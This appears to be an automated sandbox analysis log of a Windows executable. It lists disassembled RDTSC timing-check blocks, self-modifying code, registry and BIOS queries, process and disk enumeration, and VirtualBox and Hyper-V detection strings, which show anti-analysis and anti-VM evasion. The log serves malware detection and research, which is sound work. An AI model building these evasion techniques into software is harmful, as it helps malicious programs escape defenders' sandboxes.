Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 70514A5 second address: 70514FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+24h], eax 0x0000000b jmp 00007F5FC0CE52D7h 0x00000010 mov eax, dword ptr [esi+28h] 0x00000013 pushad 0x00000014 mov di, si 0x00000017 pushfd 0x00000018 jmp 00007F5FC0CE52D0h 0x0000001d sub ax, B698h 0x00000022 jmp 00007F5FC0CE52CBh 0x00000027 popfd 0x00000028 popad 0x00000029 mov dword ptr [edx+28h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 70514FA second address: 7051500 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7051500 second address: 70515E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [esi+2Ch] 0x0000000c jmp 00007F5FC0CE52D0h 0x00000011 mov dword ptr [edx+2Ch], ecx 0x00000014 jmp 00007F5FC0CE52D0h 0x00000019 mov ax, word ptr [esi+30h] 0x0000001d pushad 0x0000001e pushad 0x0000001f movzx eax, di 0x00000022 pushfd 0x00000023 jmp 00007F5FC0CE52D9h 0x00000028 or si, DEF6h 0x0000002d jmp 00007F5FC0CE52D1h 0x00000032 popfd 0x00000033 popad 0x00000034 mov dx, cx 0x00000037 popad 0x00000038 mov word ptr [edx+30h], ax 0x0000003c jmp 00007F5FC0CE52CAh 0x00000041 mov ax, word ptr [esi+32h] 0x00000045 jmp 00007F5FC0CE52D0h 0x0000004a mov word ptr [edx+32h], ax 0x0000004e pushad 0x0000004f pushfd 0x00000050 jmp 00007F5FC0CE52CEh 0x00000055 or ecx, 1E4AEA78h 0x0000005b jmp 00007F5FC0CE52CBh 0x00000060 popfd 0x00000061 jmp 00007F5FC0CE52D8h 0x00000066 popad 0x00000067 mov eax, dword ptr [esi+34h] 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F5FC0CE52CAh 0x00000073 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 70515E5 second address: 70515F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 70515F4 second address: 70515FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 70515FA second address: 70515FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 70515FE second address: 7051630 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+34h], eax 0x0000000b jmp 00007F5FC0CE52D7h 0x00000010 test ecx, 00000700h 0x00000016 pushad 0x00000017 push ecx 0x00000018 movsx edx, si 0x0000001b pop ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e mov eax, edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7051630 second address: 7051689 instructions: 0x00000000 rdtsc 0x00000002 mov ax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 jne 00007F602F755AE5h 0x0000000e jmp 00007F5FC0E77A11h 0x00000013 or dword ptr [edx+38h], FFFFFFFFh 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push edi 0x0000001b pop ecx 0x0000001c pushfd 0x0000001d jmp 00007F5FC0E77A0Fh 0x00000022 xor esi, 356ADFBEh 0x00000028 jmp 00007F5FC0E77A19h 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7051689 second address: 705172C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5FC0CE52D7h 0x00000008 pop eax 0x00000009 jmp 00007F5FC0CE52D9h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000015 jmp 00007F5FC0CE52CEh 0x0000001a or dword ptr [edx+40h], FFFFFFFFh 0x0000001e jmp 00007F5FC0CE52D0h 0x00000023 pop esi 0x00000024 jmp 00007F5FC0CE52D0h 0x00000029 pop ebx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F5FC0CE52CEh 0x00000031 jmp 00007F5FC0CE52D5h 0x00000036 popfd 0x00000037 movzx eax, di 0x0000003a popad 0x0000003b leave 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f mov di, ax 0x00000042 mov ah, 39h 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 70A0B19 second address: 70A0B6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F5FC0E77A0Bh 0x0000000b or ecx, 05A81DBEh 0x00000011 jmp 00007F5FC0E77A19h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5FC0E77A18h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 70A0B6A second address: 70A0B6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 70A0B6E second address: 70A0B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 70A0B74 second address: 70A0BA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F5FC0CE52CFh 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5FC0CE52D5h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 70A0BA6 second address: 70A0BB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0E77A0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 6FE0018 second address: 6FE001E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 6FE001E second address: 6FE003B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5FC0E77A10h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 6FE003B second address: 6FE0041 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 6FE0041 second address: 6FE0047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 6FE0047 second address: 6FE004B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 6FE0B5D second address: 6FE0B78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 6FE0B78 second address: 6FE0B95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 6FE0B95 second address: 6FE0B9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 6FE0B9B second address: 6FE0B9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 6FE0B9F second address: 6FE0C2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov edi, 141DCE3Ah 0x00000012 call 00007F5FC0E77A0Bh 0x00000017 pushfd 0x00000018 jmp 00007F5FC0E77A18h 0x0000001d jmp 00007F5FC0E77A15h 0x00000022 popfd 0x00000023 pop esi 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 jmp 00007F5FC0E77A17h 0x0000002b mov ebp, esp 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F5FC0E77A15h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7010038 second address: 7010081 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d mov edx, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007F5FC0CE52D6h 0x00000017 sbb ax, 3EB8h 0x0000001c jmp 00007F5FC0CE52CBh 0x00000021 popfd 0x00000022 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7010081 second address: 70100BB instructions: 0x00000000 rdtsc 0x00000002 call 00007F5FC0E77A18h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d jmp 00007F5FC0E77A11h 0x00000012 and esp, FFFFFFF0h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 70100BB second address: 70100BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 70100BF second address: 70100C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 70100C5 second address: 7010116 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 44h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, di 0x00000012 pushfd 0x00000013 jmp 00007F5FC0CE52D9h 0x00000018 xor ax, BEC6h 0x0000001d jmp 00007F5FC0CE52D1h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7010116 second address: 7010195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 mov di, AD4Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e movzx ecx, di 0x00000011 pushfd 0x00000012 jmp 00007F5FC0E77A0Dh 0x00000017 xor cx, D6D6h 0x0000001c jmp 00007F5FC0E77A11h 0x00000021 popfd 0x00000022 popad 0x00000023 mov dword ptr [esp], ebx 0x00000026 jmp 00007F5FC0E77A0Eh 0x0000002b xchg eax, esi 0x0000002c pushad 0x0000002d mov ax, CE0Dh 0x00000031 pushfd 0x00000032 jmp 00007F5FC0E77A0Ah 0x00000037 jmp 00007F5FC0E77A15h 0x0000003c popfd 0x0000003d popad 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F5FC0E77A0Ch 0x00000046 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7010195 second address: 7010236 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F5FC0CE52D6h 0x0000000f xchg eax, edi 0x00000010 jmp 00007F5FC0CE52D0h 0x00000015 push eax 0x00000016 jmp 00007F5FC0CE52CBh 0x0000001b xchg eax, edi 0x0000001c pushad 0x0000001d jmp 00007F5FC0CE52D4h 0x00000022 mov ah, 31h 0x00000024 popad 0x00000025 mov edi, dword ptr [ebp+08h] 0x00000028 jmp 00007F5FC0CE52CDh 0x0000002d mov dword ptr [esp+24h], 00000000h 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov edx, 1D50D63Eh 0x0000003d pushfd 0x0000003e jmp 00007F5FC0CE52CFh 0x00000043 jmp 00007F5FC0CE52D3h 0x00000048 popfd 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7010236 second address: 7010283 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock bts dword ptr [edi], 00000000h 0x0000000e jmp 00007F5FC0E77A0Eh 0x00000013 jc 00007F6030D29BD3h 0x00000019 jmp 00007F5FC0E77A10h 0x0000001e pop edi 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7010283 second address: 7010289 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7010289 second address: 701028F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 701028F second address: 70102B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5FC0CE52D9h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70102B3 second address: 70102E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5FC0E77A17h 0x00000008 pop esi 0x00000009 mov dx, 97CCh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5FC0E77A0Dh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70102E7 second address: 70102FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 704090C second address: 7040979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 pushad 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F5FC0E77A17h 0x0000000f add ax, BA0Eh 0x00000014 jmp 00007F5FC0E77A19h 0x00000019 popfd 0x0000001a jmp 00007F5FC0E77A10h 0x0000001f popad 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F5FC0E77A17h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7040979 second address: 704097F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70308DC second address: 7030903 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5FC0E77A15h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7030903 second address: 70309AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F5FC0CE52D1h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 jmp 00007F5FC0CE52CCh 0x00000016 mov ecx, 20D56BC1h 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e pushad 0x0000001f pushad 0x00000020 call 00007F5FC0CE52D8h 0x00000025 pop esi 0x00000026 push edx 0x00000027 pop ecx 0x00000028 popad 0x00000029 pushfd 0x0000002a jmp 00007F5FC0CE52D7h 0x0000002f xor si, B74Eh 0x00000034 jmp 00007F5FC0CE52D9h 0x00000039 popfd 0x0000003a popad 0x0000003b pop ebp 0x0000003c pushad 0x0000003d call 00007F5FC0CE52CCh 0x00000042 pushad 0x00000043 popad 0x00000044 pop eax 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7040BD3 second address: 7040C40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5FC0E77A17h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F5FC0E77A19h 0x0000000f sbb ch, 00000006h 0x00000012 jmp 00007F5FC0E77A11h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c jmp 00007F5FC0E77A0Eh 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F5FC0E77A0Eh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7040C40 second address: 7040C52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0CE52CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7040C52 second address: 7040CAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d jmp 00007F5FC0E77A14h 0x00000012 pushfd 0x00000013 jmp 00007F5FC0E77A12h 0x00000018 jmp 00007F5FC0E77A15h 0x0000001d popfd 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7040CAB second address: 7040CAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7040CAF second address: 7040CB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7040CB3 second address: 7040CB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7040CB9 second address: 7040CBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7040CBF second address: 7040CD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov dx, 4F28h 0x00000012 mov ecx, edx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7040CD4 second address: 7040CDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7040CDA second address: 7040CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7040CDE second address: 7040CF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov di, 9470h 0x00000012 mov bx, 879Ch 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7040CF5 second address: 7040D0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0CE52D1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7040D0A second address: 7040D0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70B05F0 second address: 70B0652 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F5FC0CE52D0h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov edx, 350A5164h 0x00000016 mov bx, 1FD0h 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c jmp 00007F5FC0CE52CFh 0x00000021 mov ebp, esp 0x00000023 pushad 0x00000024 push ecx 0x00000025 movsx edx, ax 0x00000028 pop eax 0x00000029 jmp 00007F5FC0CE52CDh 0x0000002e popad 0x0000002f mov dl, byte ptr [ebp+14h] 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70B0652 second address: 70B0656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70B0656 second address: 70B065C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70B065C second address: 70B0661 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70B0661 second address: 70B06D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F5FC0CE52CEh 0x0000000a jmp 00007F5FC0CE52D5h 0x0000000f popfd 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov eax, dword ptr [ebp+10h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F5FC0CE52D3h 0x0000001f sub al, FFFFFF9Eh 0x00000022 jmp 00007F5FC0CE52D9h 0x00000027 popfd 0x00000028 call 00007F5FC0CE52D0h 0x0000002d pop eax 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Special instruction interceptor: First address: C5512B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Special instruction interceptor: First address: C82EBC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Special instruction interceptor: First address: C69591 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Special instruction interceptor: First address: CE3A2E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\A3nofpjN9A.exe TID: 5996 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_2_003D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_003D255D (reported twice)
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_2_003D29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_003D29FF
Source: A3nofpjN9A.exe, A3nofpjN9A.exe, 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: A3nofpjN9A.exe, 00000000.00000003.2169724733.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000003.2169437946.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000002.2204540533.0000000001800000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000003.2169602744.00000000017F6000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000003.2170003230.00000000017FF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllBAQE
Source: A3nofpjN9A.exe | Binary or memory string: Hyper-V RAW
